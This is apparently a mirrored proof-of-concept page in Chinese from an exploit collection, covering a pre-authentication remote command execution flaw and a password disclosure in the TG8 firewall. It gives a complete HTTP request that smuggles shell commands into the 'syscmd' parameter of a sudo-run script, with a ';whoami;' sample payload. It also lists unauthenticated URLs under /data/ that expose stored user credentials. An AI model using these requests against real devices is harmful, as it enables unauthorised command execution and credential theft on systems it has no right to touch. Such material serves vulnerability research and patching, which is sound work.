mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-08 20:36:14 +00:00
52 lines
1.3 KiB
Markdown
52 lines
1.3 KiB
Markdown
# TG8 防火墙 RCE及密码泄漏漏洞
|
||
|
||
## 漏洞描述
|
||
|
||
TG8防火墙中存在两个漏洞,远程用户可以以用户身份执行命令而无需通过设备进行身份验证。第二个漏洞允许在不经过身份验证的情况下公开现有用户的密码。
|
||
|
||
参考链接:
|
||
|
||
- https://ssd-disclosure.com/ssd-advisory-tg8-firewall-preauth-rce-and-password-disclosure/
|
||
|
||
## 漏洞复现
|
||
|
||
### RCE
|
||
|
||
poc:
|
||
|
||
```
|
||
POST http://<server>/admin/runphpcmd.php HTTP/1.1
|
||
Host: Server
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
|
||
Accept: application/json, text/javascript, */*; q=0.01
|
||
Accept-Language: en-US,en;q=0.5
|
||
Accept-Encoding: gzip, deflate
|
||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||
X-Requested-With: XMLHttpRequest
|
||
Content-Length: 68
|
||
Connection: keep-alive
|
||
|
||
|
||
syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+<Payload>++local
|
||
```
|
||
|
||
执行whoami:
|
||
|
||
```
|
||
syscmd=sudo+/home/TG8/v3/syscmd/check_gui_login.sh+;whoami;++local
|
||
```
|
||
|
||
### 密码泄露
|
||
|
||
/data/目录下储存了登录过用户的凭据,无需登录即可访问此目录下的文件。
|
||
|
||
例如:
|
||
|
||
```
|
||
http://<server>/data/w-341.tg
|
||
http://<server>/data/w-342.tg
|
||
http://<server>/data/r-341.tg
|
||
http://<server>/data/r-342.tg
|
||
```
|
||
|